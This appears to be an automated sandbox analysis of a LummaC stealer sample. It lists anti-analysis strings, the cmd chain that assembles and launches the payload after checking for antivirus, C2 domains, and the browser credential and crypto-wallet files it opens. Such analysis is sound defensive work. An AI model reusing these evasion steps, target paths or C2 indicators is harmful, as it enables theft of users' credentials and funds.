Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000008.00000003.1320991634.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Climb.com, 00000015.00000003.1602150368.0000000003A23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Set-up.exe, 00000008.00000003.1320040104.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1524058618.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1524589542.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.1527115823.000000000131B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1524131578.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: es5qBEFupj.exe, 00000000.00000003.1280366142.0000000005300000.00000004.00001000.00020000.00000000.sdmp, es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: es5qBEFupj.exe, 00000000.00000002.1322469608.0000000000C64000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\es5qBEFupj.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\es5qBEFupj.exe	File opened: NTICE
Source: C:\Users\user\Desktop\es5qBEFupj.exe	File opened: SICE
Source: C:\Users\user\Desktop\es5qBEFupj.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0012F4FF BlockInput,

21_2_0012F4FF

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_000B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

21_2_000B338B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 7_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

7_2_00406328

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_000D5058 mov eax, dword ptr fs:[00000030h]

21_2_000D5058

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_001120AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

21_2_001120AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000E2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000E2992
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000D0BAF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D0D45 SetUnhandledExceptionFilter,	21_2_000D0D45
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000D0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000D0F91

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Climb.com, 00000015.00000003.1524980481.0000000001109000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: spuriotis.click

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

21_2_00111B4D

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_000B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

21_2_000B338B

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0011BBED SendInput,keybd_event,

21_2_0011BBED

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0011EC6C mouse_event,

21_2_0011EC6C

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_001114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

21_2_001114AE

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_00111FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

21_2_00111FB0

Source: Climb.com, 00000015.00000003.1531954066.0000000003DEA000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmp, Alt.18.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000002.1322469608.0000000000C64000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: Climb.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_000D0A08 cpuid

21_2_000D0A08

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0010E5F4 GetLocalTime,

21_2_0010E5F4

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_0010E652 GetUserNameW,

21_2_0010E652

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_000EBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

21_2_000EBCD2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 7_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

7_2_00406831

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Climb.com PID: 7780, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets\
Source: Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: Climb.com, 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
Source: Climb.com, 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.7:49726 -> 194.87.58.92:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
